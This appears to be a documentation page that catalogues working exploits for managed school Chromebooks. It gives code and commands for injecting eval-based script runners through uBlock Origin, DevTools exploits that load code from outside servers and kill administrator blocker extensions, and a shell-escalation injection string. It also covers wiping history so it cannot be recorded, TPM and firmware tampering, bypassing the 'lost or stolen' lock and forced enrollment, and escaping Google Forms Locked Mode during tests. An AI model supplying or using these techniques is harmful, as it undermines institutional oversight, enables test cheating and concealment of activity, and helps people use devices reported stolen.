Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/S-PScripts/chromebook-utilities/llms.txt

Use this file to discover all available pages before exploring further.

On a managed Chromebook, direct JavaScript execution is usually restricted: javascript: bookmarks are patched, the DevTools console may be blocked, and extensions are locked down by policy. Script runners work around these restrictions by piggybacking on allowed extensions or apps — such as uBlock Origin, Snap & Read, or the OneTab extension — to evaluate arbitrary code in the page context. This page catalogues every known runner and execution method, along with developer tools access bypasses, useful Chrome internal URLs, and a collection of miscellaneous utilities that operate outside the standard managed profile restrictions.

Script Execution Methods

The Bookmarklet Executor by AshtonDavies is a deprecated but still-functional extension that restores javascript: bookmark execution.Note: This probably won’t work anymore on current ChromeOS.Extension link: Chrome Web Store — Bookmarklet Executor
1

Change your DNS

Go to Settings → Wi-Fi → click your network name → Network section → scroll to Name servers → set to Custom Name Servers → enter 94.140.14.49 as the first DNS server.
2

Reconnect

Disconnect and reconnect to your Wi-Fi to apply the DNS change.
3

Link your IP

Go to https://chrose.netlify.app/detail/bookmarklet%20executor/ and click Link IP address. Alternatively, use the direct link: https://linkip.adguard-dns.com/linkip/b22da83d/7ALdhr5HpGcJBbWaLr0PCkX3jxMbMdM1Br89HlCi5Pl
4

Install from the Web Store

Navigate to https://tiny.cc/bookmarkletexec (or the direct CWS link above). If a KProxy error appears, click OK and navigate to the link again.
Credits: AshtonDavies
If your school allows the uBlock Origin extension, you can execute arbitrary JavaScript on any page by injecting a custom user script via uBlock’s userResourcesLocation setting.Requirements: uBlock OriginThe script to inject (save this as execute_script.js):
/// execute_script.js
window.addEventListener("keyup", event => {
  if (event.ctrlKey && event.which === 192) {
      eval(prompt("Javascript code:"));
  }
})
1

Open uBlock settings

Go to the uBlock Origin extension settings.
2

Enable advanced user mode

Under the Settings tab, check the I am an advanced user box, then click the small cog icon that appears.
3

Set userResourcesLocation

Find userResourcesLocation and change it from unset to the full content of the execute_script.js code above (paste the code itself, not a URL).
4

Add the filter rule

Go to the My filters tab and add:
*##+js(execute_script.js)
5

Use it

On any page, press `Ctrl + Shift + “ (backtick) to open a prompt. Enter your JavaScript code and press OK.
Credits: 3kh0/ext-remover
uBlobeBM is a full bookmarklet manager built on top of uBlock Origin. It provides a persistent UI for storing, naming, editing, and running multiple bookmarklets — even if the native javascript: bookmark functionality is disabled.Requirements: uBlock OriginCredits: Blobby-Boi
1

Set userResourcesLocation

Go to chrome-extension://cjpalhdlnbpafiamejdnhcphjbkeiagm/advanced-settings.html, find userResourcesLocation, and change it from unset to:
https://raw.githubusercontent.com/Blobby-Boi/uBlobeBM/refs/heads/main/blob.js
2

Add the filter rule

Go to chrome-extension://cjpalhdlnbpafiamejdnhcphjbkeiagm/1p-filters.html and add:
*##+js(blob.js)
3

Open the uBlobeBM UI

Press Ctrl + Shift + ~ on any page to open the uBlobeBM panel.
4

Add a bookmarklet

In the panel, enter your bookmarklet code in the Enter bookmarklet here field and click the green Add Bookmarklet button. Give it a memorable name.
5

Run a bookmarklet

Click the blue button next to any saved bookmarklet to execute it. The red button removes it; the other two buttons rename and edit it. Hover over the blue button to preview the code.
Bookmarklets saved in uBlobeBM persist even after closing the window or shutting down the device.
uRun is an improved version of the basic uBlock script runner with a graphical interface. It opens a small popup window where you can write, save, and execute scripts.Requirements: uBlock OriginCredits: Inglan2 / 3kh0/ext-removerThe script to inject:
/// urun.js
document.addEventListener("keydown", function (e) {
    if (e.key == "~" && e.ctrlKey) {
        var t = window.open("", "_blank", "width=500,height=300");
        var e = t.document.createElement("iframe");
        (e.src = "//ustuff.github.io/uRun/popup.html"),
            (e.style.cssText = "width:100%; height:100%; border:none;"),
            t.document.body.appendChild(e),
            t.document.title = "uRun",
            t.addEventListener("message", function (e) {
                e.data.toString().startsWith("execute:") && (eval(e.data.toString().replace("execute:", "")), t.close());
            });
    }
});
1

Open uBlock settings and enable advanced mode

Go to uBlock Origin settings → Settings tab → check I am an advanced user → click the cog icon.
2

Set userResourcesLocation

Find userResourcesLocation and paste the full urun.js code above as its value.
3

Add the filter rule

In the My filters tab, add:
*##+js(urun.js)
4

Open the uRun menu

Press `Ctrl + Shift + “ on any page. A small popup window will open with a script editor.
5

Add and run scripts

Click the + button in the top right to add a new script (enter the code without the javascript: prefix). Click a saved script to run it.
Snap & Read is an accessibility extension that many schools install and cannot easily remove. Its outline and link features can be exploited to store and execute javascript: URLs, bypassing the normal bookmarklet block.Requirements: The Snap & Read extension must be installed and signed in to an active account.Credits: AshtonDaviesSetup:
1

Enable the Snap & Read toolbar

Open the Snap & Read popup by activating the extension, then toggle the Snap & Read switch on.
2

Open Outlines and create a new entry

In the toolbar, click Show outlines. In the outlines panel, click the New outline (+) button at the top left.
3

Enter topic text

Enter any text into the outline topic’s editable text area, then click the bullet point of the topic.
4

Link to source

Click Link to source → click the + button at the bottom right → switch to the WEBSITE tab.
5

Enter the bookmarklet

In Article/Page title, enter the name of your bookmarklet. In the URL field, enter the bookmarklet source starting with javascript:. You may need to substitute escape characters for advanced bookmarklets. Click SAVE at the top right.
6

Switch back to Outline tab

Click the OUTLINE tab, then click Hide outlines in the toolbar.
Execution (on any page):
1

Show outlines

In the Snap & Read toolbar, click Show outlines.
2

Click the bookmarklet link

In your created outline, click the link (shown in parentheses) that contains your bookmarklet.
3

Hide outlines

Click Hide outlines in the toolbar.
Tr3nch is an advanced script runner that uses Skiovox Breakout and Sh0vel to execute scripts inside Chrome’s privileged pages, including chrome:// System Web Apps. It provides a full menu for running and managing scripts.Links:Credits: Zeglol1234 (main developer), Writable (Skiovox Breakout implementation), Bypassi (Add Gmails), Titanium NetworkFinding a suitable extension for Sh0vel:
1

Check installed extensions

Go to chrome://extensions. For each extension, click Details and check if it has the Read your browsing history permission.
2

Install an extension if needed

If no suitable extension is installed, go to the Chrome Web Store and find one with that permission, then click Add to Chrome.
3

Get the extension ID

Go to chrome://extensions, open the extension’s details page, and copy the 32-character ID from the address bar after ?id=.
4

Verify the manifest

Navigate to chrome-extension://EXTENSION_ID/manifest.json. Press Ctrl + F and check that the following are all present:
  • "activeTab"
  • "unsafe-eval" (NOT wasm-unsafe-eval — that will not work)
  • "browser_action" or "browserAction"
Performing the exploit:
1

Enter Skiovox

Enter a kiosk profile with Skiovox performed (see the Skiovox guide).
2

Download Skiovox Breakout

Navigate to the Skiovox Breakout repository. Click CodeDownload ZIP. Save to the Downloads folder.
3

Load the extension in dev mode

Go to chrome://extensions, enable Developer Mode, click Load unpacked, right-click the downloaded ZIP → Extract all, then open the skiovox-breakout-main folder.
4

Create the opener disk image

Navigate to chrome-untrusted://crosh and run:
vmc create-extra-disk --size=1 /home/chronos/user/MyFiles/Downloads/opener.txt
It should return: A raw disk is created at /home/chronos/user/MyFiles/Downloads/opener.txt.
5

Open a new tab and open File Manager

Open a new tab. If the default New Tab page loads, install the Skiovox Helper extension first. Click the folder icon in the bottom right to open File Manager.
6

Open the opener file

Navigate to Downloads and open opener.txt. A new blank-page window should open — this window is managed by your organisation.
7

Switch to the regular window

Open a new tab, close the blank page tab, and return to the regular non-managed window.
8

Inject via Skiovox Breakout

Go to chrome://extensions, copy the ID of the extension you chose earlier. In the regular window, click the Skiovox Breakout extension icon, paste the extension ID, set the textarea to the script you want to run, and click Start injection.
Loading the Tr3nch menu:
1

Enable the chrome-urls flag

Go to chrome://flags, enable extensions-on-chrome-urls, and restart.
2

Navigate to a privileged page

Open one of: chrome://os-settings, chrome://settings, chrome://extensions, chrome://chrome-signin, chrome://inspect, chrome://file-manager, chrome://network, or chrome://oobe.
3

Activate the injected extension

Click the extensions icon in the toolbar and activate the extension with the injected Tr3nch script. The Tr3nch menu should launch.
The OneTab extension’s import feature can be abused to rapidly open blocked URLs in succession. Spamming the import and open actions can cause a blocked page to momentarily load before the blocking extension catches it.Requirements: The OneTab extension must be installable.Credits: 3kh0/ext-remover, Coding4Hours
1

Open OneTab settings

Click the OneTab extension and go to the Import section in its settings tab.
2

Flood the import list

Copy-paste the URL you want to visit approximately 100 times into the import text area, then click Import.
3

Spam-click the top link

Rapidly click the top link in OneTab, then either spam Esc on one of the resulting tabs or wait for one to load on an about:blank page.
Turbowarp (a Scratch mod) is frequently not blocked at schools because Scratch is considered educational software. Turbowarp’s IFrame extension lets you load any URL or raw HTML inside the project editor, effectively bypassing web filters.Credits: gavin / Titanium Network
1

Open Turbowarp with the IFrame extension

Navigate to:
https://turbowarp.org/editor?extension=https://extensions.turbowarp.org/iframe.js
This automatically includes the IFrame extension — no manual setup required.
2

Load a URL or HTML

Go to the IFrame tab in the block palette and use one of:
  • Website — enter the URL you want to view
  • HTML — enter raw HTML code to render
3

Run the project

Click the green flag to execute the block and display your content.
4

Close the IFrame

Click the Close IFrame block when done.
Fallback links:
  • Mirror: https://mirror.turbowarp.xyz/editor?extension=https://extensions.turbowarp.org/iframe.js
  • PenguinMod (if Turbowarp is blocked): https://studio.penguinmod.com/editor.html — add the IFrame extension manually
  • Self-host a mirror: github.com/TurboWarp/mirror

Developer Tools and Inspection

HarTools — DevTools Code Execution (up to v132)

HarTools exploits a vulnerability in .har files to open a javascript: URL and execute code on devtools://devtools, giving access to the DevTools API and code execution in extensions (similar to RigTools). Does not work on v133+ or some versions of v132. Credits: Crossjbly (vulnerability), Blobby Boi (payloads/UI), HarryJarry1 (autoxss), unretained (original devtools XSS)
1

Download HARTOOLS.har

Download HARTOOLS.har from:
https://github.com/crossjbly/HarTools/releases/latest/download/HARTOOLS.har
2

Open the DevTools inspector

Navigate to:
devtools://devtools/bundled/inspector.html
Once loaded, append ?experiments=true to the URL.If inspector.html is blocked, substitute it with any of: js_app.html, devtools_app.html, or worker_app.html.
3

Import the HAR file

In the inspector sidebar, click the >> arrows and select Network from the dropdown. Click the upload button and select HARTOOLS.har. You may need to widen the sidebar to see the upload button.
4

Trigger the payload

Double-click on the text that appears in the network box. The payload executes.
Creating custom payloads: Clone the repo with git clone https://github.com/crossjbly/HarTools.git, make changes to the HTML/JS files, run python autoxss.py, then paste the contents of autoxss.js into the generator.

Unblocked Dev Tools + Flags (via Launch Options)

This method uses a bash shell obtained from a prior exploit (such as the Permanently Remove Extensions method) to add Chrome launch options — equivalent to chrome://flags but with a much larger set of available switches. Reference: Full list of switches at peter.sh/experiments/chromium-command-line-switches Notable switches:
  • --force-devtools-available — forces DevTools to be available
  • --bwsi — guest mode
  • --kiosk — kiosk mode
  • --oauth-client-id — breaks policy updating and profile syncing
  • --disable-extensions-except — disable all extensions except specified ones
  • --show-login-dev-overlay / --show-oobe-dev-overlay
1

Get a bash shell

Obtain a shell using a prior exploit. This method builds on the Permanently Remove Extensions approach.
2

Create the exploit script

Run cd ~/Downloads then vi exploit.sh to create a new shell file.
3

Add pkill and command line

In vi, add the line pkill -9 chrome. Then go to chrome://version, copy the entire text next to Command line:, and paste it as a new line in the file.
4

Add your launch options

Append any desired launch switches to the command line in the file.
5

Execute

Exit vi and run:
sh <(cat exploit.sh) & disown
Credits: CoolElectronics/velzie / Titanium Network

View Source Bypass

If Ctrl + U is blocked, you can still view page source by prepending view-source: to the URL. 
view-source:https://github.com

Chrome Internal URLs

A comprehensive list of chrome:// and chrome-untrusted:// URLs available on ChromeOS. Many of these provide access to diagnostics, settings, and internal state that may not be reachable through the standard UI on managed devices.
General pages:
chrome://accessibility
chrome://bluetooth-internals
chrome://bookmarks
chrome://certificate-manager
chrome://chrome-urls
chrome://components
chrome://crashes
chrome://device-log
chrome://diagnostics
chrome://downloads
chrome://extensions
chrome://extensions-internals
chrome://file-manager
chrome://flags
chrome://gpu
chrome://history
chrome://inspect
chrome://internals
chrome://management
chrome://net-internals
chrome://network
chrome://os-settings
chrome://policy
chrome://settings
chrome://sys-internals
chrome://system
chrome://version
ChromeOS-specific:
chrome://camera-app
chrome://connectivity-diagnostics
chrome://crostini-installer
chrome://cryptohome
chrome://diagnostics
chrome://drive-internals
chrome://healthd-internals
chrome://multidevice-setup
chrome://nearby
chrome://os-feedback
chrome://os-print
chrome://personalization
chrome://power
chrome://print-management
chrome://scanning
chrome://shortcut-customization
chrome://vm
Untrusted (SWA) pages:
chrome-untrusted://crosh
chrome-untrusted://file-manager
chrome-untrusted://terminal
chrome-untrusted://media-app
chrome-untrusted://help-app
Internal debugging (when enabled):
chrome://discards
chrome://interstitials
chrome://local-state
chrome://memory-internals
chrome://network-errors
chrome://omnibox
chrome://safe-browsing
chrome://tracing
chrome://user-actions
Crash/debug commands (type manually — these crash or hang the browser):
chrome://crash
chrome://kill
chrome://hang
chrome://restart
chrome://quit
chrome://memory-exhaust
chrome://gpucrash

ChromeOS File and DevTools URLs

Useful internal extension and DevTools URLs for direct access to ChromeOS components: 
chrome-extension://mhjfbmdgcfjbbpaeojofohoefgiehjai/index.html       — Chrome PDF Viewer
chrome-extension://hhaomjibdihmijegdhdafkllkbggdgoj/main.html         — ChromeOS Files App
chrome-extension://nkoccljplnhpfnfiajclkommnmllphnl/html/crosh.html   — CROSH (extension)
chrome-untrusted://crosh                                               — CROSH (SWA)
chrome-extension://gbkeegbaiigmenfmjfclcdgdpimangkj/views/app.html    — Office Editing
devtools://devtools/bundled/inspector.html                             — Inspector
devtools://devtools/bundled/devtools_app.html                         — DevTools App
file:///var/log/                                                       — System logs (Index of /var/log/)
chrome-error://chromewebdata/                                          — Broken page (useful as an origin)
Extension icon and manifest access: 
chrome://extension-icon/[ExtensionID]/[1-128]/1
chrome-extension://[ExtensionID]/manifest.json

Additional Utilities

RigTools (v128 and below)

RigTools exploits a crbug (found by Writable in early 2024) that allows code execution inside devtools://devtools. It can kill blocking extensions that have extension management permissions.
RigTools only works on ChromeOS v128 and below. Links may sometimes be down — try an alternative if one fails.
1

Open DevTools

Navigate to devtools://devtools/bundled/devtools_app.html.
2

Open a RigTools link in a new tab

Try one of the following links:
devtools://devtools/bundled/devtools_app.html?experiments=true&wss=rig.ccsd.store
devtools://devtools/bundled/devtools_app.html?experiments=true&ws=rigtools.appleflyer.xyz:5506
devtools://devtools/bundled/devtools_app.html?experiments=true&ws=sincereham222.cc:8080
devtools://devtools/bundled/devtools_app.html?experiments=true&wss=rwpk9g-8080.csb.app
3

Double-click the gray box

In the Network tab of the DevTools page, double-click the gray box that appears.
4

Enter your blocker extension's ID

Click the extension id button and paste the ID of your school’s blocking extension (it must be administrator-installed and have extension management permissions).
5

Kill the extension

Click P5 to kill the currently selected extension, or P3 and paste a specific extension ID to kill a different one.
After using RigTools, the chrome.management page is located at filesystem:chrome-extension://ext-id/temporary/index.html. Bookmark this page — it persists after shutdown and is only overwritten by using RigTools again.
Credits: Writable (FWSmasher/rigtools) / v0idk

History Wiper

Permanently wipes Chrome history without powerwashing or using a second device. Requires Crosh access and a way to elevate to chronos-level permissions. Requirements: Crosh access, ability to control sync, chronos or root access, knowledge of the ChromeOS file system.
1

Disable and encrypt sync

Turn off sync for at least history (ideally everything) and encrypt with a password to prevent any data from syncing.
2

Elevate to chronos

In Crosh, run set_cellular_ppp \';bash;exit;\' to elevate to chronos permissions.
3

Change to the main directory

Run cd to change to the main directory.
4

Wipe history files

Run each of the following commands:
chmod 777 History
rm -rf History
mkdir History
chmod 000 History
chmod 777 History-journal
rm -rf History-journal
mkdir History-journal
chmod 000 History-journal
These create dummy directories that Chrome can no longer write history to. For a quick version:
chmod 000 History;chmod 000 History-journal
Credits: Fallenmoon8080 / Titanium Network

History Deletion (Multiple Methods)

Method 1 — Sign out and remove account (loses local files): Sign out and remove the account from the device, then sign back in.Method 2 — Wipe synced data ⚠️ This wipes ALL synced data (apps, extensions, bookmarks, history):
  1. Ensure you are synced to Google Chrome.
  2. Go to https://chrome.google.com/sync and press Clear data.
  3. Sign out, remove the account, then sign back in.
Method 3 — Clear from a different device: On a personal device, sign in to your school account, go to chrome://settings/clearBrowserData, and clear history.Method 4 — Clear via settings even if chrome://history is blocked: Go directly to chrome://settings/clearBrowserData and delete history from there.Method 5 — Disable sync before clearing:
  1. Hold Esc + Refresh + Power to enter recovery, or powerwash.
  2. Log in and immediately turn off Wi-Fi.
  3. Go to chrome://settings/syncSetup/advancedCustomize sync → turn off sync for History → save.
  4. Turn Wi-Fi back on.

WH4LE

WH4LE is frequently promoted online as the “best exploit” for managed Chromebooks. 
https://whale.x10.mx/
WH4LE is fake. The HTML has been decoded and shows no real exploit functionality. Source: github.com/schoolexploitkid/WHALE-exploit

Bypass “Reported Lost or Stolen”

When a ChromeOS device is marked as lost or stolen by the administrator, a message screen appears on boot. This message is rendered as a hidden kiosk app and can be cancelled during startup. Tested on: R117 and R124 (inconsistent — may not work every time).
1

Watch for the ChromeOS logo

When the ChromeOS logo appears after a reboot, act immediately.
2

Spam Ctrl + Alt + S

Spam Ctrl + Alt + S while the logo is on screen. The loading will cancel and you will be returned to the sign-in screen.
Credits: zeglol / Hannah (#Cr50GoKaboom) / Titanium Network

ChromeOS Terminal Redirector

Opens a blocked website through the ChromeOS Terminal app by using the SSH relay server options field. Only loads the first page — subsequent navigation will still be blocked. Working blockers: Securly Partially working: GoGuardian (blocks after ~5 minutes) Not working: Cisco Umbrella, Lightspeed
1

Open Terminal and create a new SSH connection

Open the Terminal app and create a new SSH connection profile.
2

Set the configuration

  • Command: chronos@127.0.0.1 (the exact value doesn’t matter, just needs to follow user@host format)
  • SSH relay server options: --proxy-host=blocked_site.tld/path# --proxy-port=443 --use-ssl=true
Example for Discord: --proxy-host=discord.com/app# --proxy-port=443 --use-ssl=true
3

Launch the connection

Right-click the Terminal app icon and select your new SSH profile. The blocked site will load.
Credits: 9pfs / Titanium Network

Enterprise Enrollment Glitch

Lets you set up a Chromebook as a personal device even when it would normally force enterprise enrollment, by exploiting a timing window during the enrollment process.
Enrollment must not be enforced by device policy for this exploit to work. You should sign in to your personal Google account before adding a managed profile for fewer restrictions.
1

Powerwash or enter recovery

Either press Ctrl + Alt + Shift + R on the sign-in screen to powerwash, or press Esc + ↻ + ⏻ and then Ctrl + D on the recovery screen.
2

Connect to your network

Connect to Wi-Fi on the Enterprise Enrollment screen.
3

Immediately disconnect

As soon as the enrollment screen appears, disconnect from your network.
4

Wait for enrollment to fail

Wait until enterprise enrollment fails.
5

Use as personal device

Click Use as personal device, then click Enroll manually, then reconnect to Wi-Fi.
Credits: Brandon421-ops / AshtonDavies

Locked Mode Bypasses

Google Forms Locked Mode prevents switching away from a test. Several bypasses exist.
Exploits Google’s failure to verify that locked mode is actually enforced before serving the test content. Every POST request after the first emails the form owner.Tutorial: https://tinyurl.com/LockedModeBypass2023cIf TinyURL is blocked: https://docs.google.com/spreadsheets/d/1kjsAdLZx20vcGVxvRW_ycq46hn23v3M1aimuWUC7abc/copy?usp=sharingCredits: V4PL / github.com/v4pl
Hold Esc + brightness down for a few seconds or retap repeatedly to exit locked mode. Use Alt + Tab to switch windows — do not click them directly.Credits: github.com/gambitin
Browser extension/tool for bypassing locked Google Forms.Link: https://github.com/xnasuni/google-forms-unlocker/
Opens two instances of the locked form and clicks both Continue buttons simultaneously. Primarily possible on touch screens due to the required speed.Link: https://s-pscripts.github.io/locked-mode-x/
  1. Open two windows of the locked form.
  2. Click both Continue buttons at the exact same time (practise on your own forms first).
  3. You should enter locked mode but only see a blank window with a Forms icon. Click the icon.
  4. Click the overview button (window view key) to see all windows and effectively exit locked mode.
Notes: You cannot screenshot until you complete the form properly. Use the window view key, not Alt+Tab. This is very buggy.Credits: S-PScripts
Uses locked mode itself to soft-disable force-enabled extensions on managed accounts (except Hapara Highlights and Read & Write).HTML editions (create your own link on the page):
https://ashtondavies.github.io/LoMoH?unlock
https://s-pscripts.github.io/LoMoH-ub/?opengate
JavaScript edition (older ChromeOS only — requires javascript: bookmarks to work):
javascript:(function(){if (location.hostname == 'docs.google.com') {document.body.innerHTML = document.body.innerHTML.replace('Locked mode is on', 'Are you ready to turn off extensions?');}})()
You must create your own link with the button on the page for locked mode to work within your organisation. If this is patched, clicking the link will rickroll you.Credits: AshtonDavies/LoMoH

Tab Group Exploit

Uses ChromeOS tab groups to open blocked sites while the blocking extension momentarily loses track of the tab. Requirements: chrome://flags access
If the Save group or Hide group options are not available, go to chrome://flags/#tab-groups-save, enable it, and restart. Method 1 is patched on GoGuardian v4.0.69XX.X. Method 2 cannot be used with GoGuardian.
Method 1:
  1. Use an exploit to hang your blocker extension (not required for GoGuardian).
  2. Put your tabs in a group with Save group on, then choose Hide Group.
  3. Open the tab group from the bookmarks bar.
  4. When your blocker comes back, tabs will no longer be redirected instantly.
Method 2:
  1. Put a blocked site in a group with Save group on, then choose Hide Group.
  2. Go to chrome://extensions/?id=YOURBLOCKERID.
  3. Quickly click Allow access to file URLs.
  4. Open the tab group from the bookmarks bar.
  5. Continuously flip the Allow access to file URLs switch to keep sites loading.
Credits: Brandon421-ops/Exploits-And-Hacks

BackAge — Offline Extension

Takes a blocking extension offline by disabling its JavaScript from within DevTools, preventing it from making any network requests or enforcing blocks. Requirements: chrome://extensions access, Developer Mode must not be locked.
1

Enable Developer Mode

Go to chrome://extensions and enable Developer Mode in the top right.
2

Open the extension's background page

Click on the background page of the extension you want to disable.
3

Open the Network tab

Click Network in the DevTools panel that opens.
4

Disable cache and enable throttling

Check Disable Cache, then click No throttling and change it to a throttled setting temporarily.
5

Disable JavaScript

In Settings (gear icon), scroll down and check Disable JavaScript. Do not close this DevTools window — closing it re-enables the extension.
Credits: axolotl8 / github.com/axolotl8

Lacros Bypass (v96) — Install Extensions in Unblocked Profile

Installs a separate Lacros browser with an unblocked profile, allowing extensions and incognito mode. Steps 1–7 must be done on a personal computer.
Using a local image via Chromebook Recovery Utility will wipe the target device. Proceed with caution. Use CAUB afterwards to prevent Lacros from being updated away.
1

Download the v96 ChromeOS image

Go to https://cros.download, select your device, and download ChromeOS 96.0.4664.111. If your board is not listed, it is not supported.
2

Flash the image to a USB drive

Install Chromebook Recovery Utility, click the cog gear, use a local image, and flash to a USB or SD card.
3

Boot from the USB

Plug the USB into the Chromebook and press Esc + Refresh + Power to boot from it. Install the image.
4

Sign in — do not update

Follow setup, sign in with your school account, and press Enter. Immediately turn off Wi-Fi before ChromeOS can check for updates.
5

Enable Lacros

Go to chrome://flags, search for lacros availability, enable it, and restart. Then enable both lacros support and lacros primary flags, turn off Wi-Fi, and restart.
6

Sign out in Lacros

Open the Lacros browser (yellow Chrome icon) with Wi-Fi off, go to chrome://settings/signOut, and click Remove all data from the deviceSign out. The Lacros browser will restart into an unblocked profile.
Credits: profile_encryption / Writable / Titanium Network

Shinx’s Lacros Bypass (v104)

Disables all extensions by enabling lacros-only mode, forcing the browser into an unmanaged Lacros profile. Requires downgrading to v104.
This disables ALL extensions for the duration of the session. They cannot be turned back on until the session ends. You must downgrade to v104 first.
1

Enable 'ignore lacros-availability policy' flag

Go to chrome://flags, enable ignore lacros-availability policy, and restart. (Skip if lacros support is already visible.)
2

Enable Lacros support and primary browser flags

Enable lacros support and lacros as the primary browser and restart. A yellow-icon Chrome should appear on the shelf.
3

Enable lacros-only

Enable the lacros-only flag and restart. A normal Chrome icon should now appear on the shelf.
4

Handle proxy errors

If Chrome shows ERR_MANDATORY_PROXY_CONFIGURATION_FAILED, proceed to the next step.
5

Disable lacros-only

Disable the lacros-only flag and restart.
6

Verify

Open Chrome and check bookmarks. If your blocker (e.g. Umbrella) is disabled, the exploit worked. Repeat steps 3–5 after each sign-in.
Credits: soggy / Titanium Network

Side Panel Webview (v108–v112)

Opens an in-browser webview panel that can navigate to any URL. Available on ChromeOS v108–v112.
1

Enable the flag

  • v108–v110: Go to chrome://flags/#side-panel-webview and enable it.
  • v111–v112: Go to chrome://flags#temporary-unexpire-flags-m110 and enable it.
Restart after enabling.
2

Open the side panel

Click the side panel button to the left of the three-dots icon in the browser toolbar.
3

Switch to Webview

Click Reading List at the top, then click Webview (the Chrome dino icon below the list).
4

Enter a URL

Type any URL you want to visit — it must begin with https://.
Credits: Brandon421-ops/Exploits-And-Hacks

New Chrome, Old CrOS (LaCrOS)

Lets you run the newest version of Google Chrome on an older ChromeOS version by enabling the LaCrOS flag, which decouples the browser from the OS update cycle.
As of v119, you can only enable #lacros-only. Running Lacros alongside the regular browser is no longer supported on v119+.
1

Search for Lacros flags

Go to chrome://flags and search for #lacros.
2

Enable Lacros

Enable the Lacros availability or support flag. Optionally enable #lacros-only to replace the default browser (note: this creates a second Chrome icon on older versions).
3

Restart

Restart your Chromebook. Profit.
Credits: yappable / TitaniumNetwork

Sh1mmer Fix — Reentry

Preserves TPM rollback counter values and firmware state across a ChromeOS update so that you can downgrade back to a Sh1mmer-compatible version after inadvertently updating.
Run these commands BEFORE updating. After writing back the TPM spaces, immediately recover — if the TPM is reset before you recover, the procedure must be repeated. Downgrading after a firmware update may cause a bootloop.
Before updating (requires a shell in verified mode): 
tpm_manager_client take_ownership
tpm_manager_client read_space --index=0x00001007 --file=/home/chronos/user/Downloads/ss.tpm
tpm_manager_client read_space --index=0x00001008 --file=/home/chronos/user/Downloads/ss2.tpm
Before updating (requires root in dev mode — firmware backup): 
sudo flashrom -r /home/chronos/user/Downloads/flash.bin
Save all output files (flash.bin, ss.tpm, ss2.tpm) to Google Drive or another location that survives an update. After updating and getting a shell (chronos-level is sufficient): 
tpm_manager_client take_ownership
tpm_manager_client write_space --file=<path to ss.tpm in stateful> --index 0x00001007
tpm_manager_client write_space --file=<path to ss2.tpm in stateful> --index 0x00001008
Recovery images below v112 are supported. You can then recover to an image of your choice. Credits: profile_encryption / Writable / Titanium Network

Unblock Files (via Android Files App)

Opens blocked HTML and other files in Chrome via the Android Files app, bypassing the extensions that normally enforce file-access restrictions. Tested on ChromeOS v140. Requirements: Android support (Play Store) must be enabled.
1

Place the file in Downloads

Copy or create your desired file (e.g. an .html file) in the ChromeOS Downloads folder.
2

Open Android app settings

Go to Settings → AppsManage Google Play preferencesOpen Android settings.
3

Open the Android Files app

In Android settings, go to AppsAll AppsFilesOpen. Pin it to the shelf for future use.
4

Open the file in Chrome

In the Android Files app, navigate to Downloads, right-click your file, click Open With, and select Google Chrome. The file opens in Chrome with no extension enforcement.
This works from v137 to v141 and potentially other versions. It can act as a filter bypass in some environments, though it is primarily an HTML bypass.
Credits: q8j.__ / Titanium Network

Chromium Review and Changes

For looking up ChromeOS/Chromium code reviews, patch history, and security fixes: 
https://chromium-review.googlesource.com/

Build docs developers (and LLMs) love

Get started for freeTalk to us